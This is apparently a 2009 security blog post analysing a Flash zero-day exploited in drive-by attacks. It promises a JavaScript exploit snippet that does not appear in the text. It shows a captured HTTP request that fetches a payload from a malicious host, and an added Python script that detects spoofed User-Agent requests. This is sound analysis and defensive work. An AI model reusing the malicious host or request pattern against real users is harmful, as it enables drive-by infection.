The new Flash 0-day has opened multiple avenues for malware authors. In my last article I showed how this vulnerability is being exploited via the PDF reader's support for SWF files. However, this vulnerability can just as easily be exploited in a standard drive-by fashion purely in Flash as well. This is precisely what has started to happen.
Here is the snippet of the JavaScript which is actively targeting this 0-day vulnerability.
This exploit successfully worked on my VM under Firefox 3.5.1 and Flash Player 10. It worked smoothly and just before Firefox crashed, I saw an outbound communication like this:
GET /images/x/xor.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sorla.us
Connection: Keep-Alive
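A detection check built on the request above, as an added example (not code from the original post): the request carries an MSIE 6.0 User-Agent although the VM's browser was Firefox 3.5.1, so a proxy-side rule can flag requests whose User-Agent family differs from the client's known browser. The function names, the expected-browser input and the second sample request are assumptions constructed for illustration.

```python
import re

# Request copied from the post; the sending VM's browser was Firefox 3.5.1.
CAPTURED = (
    "GET /images/x/xor.gif HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: sorla.us\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Constructed sample of a request sent by Firefox 3.5.1 itself (illustrative).
BROWSER = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1) "
    "Gecko/20090715 Firefox/3.5.1\r\n"
    "Accept: text/html\r\n\r\n"
)

def parse_request(raw):
    """Split a raw HTTP request into method, path and lower-cased headers."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def ua_family(ua):
    """Coarse browser family from a User-Agent string."""
    if re.search(r"\bFirefox/\d", ua):
        return "firefox"
    if re.search(r"\bMSIE \d", ua):
        return "msie"
    return "other"

def check(raw, expected_family):
    """Return a triage record when the User-Agent family differs from
    the browser known to run on the client, otherwise None."""
    method, path, headers = parse_request(raw)
    seen = ua_family(headers.get("user-agent", ""))
    if seen == expected_family:
        return None
    return {"host": headers.get("host"), "path": path,
            "expected": expected_family, "seen": seen}

if __name__ == "__main__":
    print(check(CAPTURED, "firefox"))
    print(check(BROWSER, "firefox"))
```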
Read more
http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html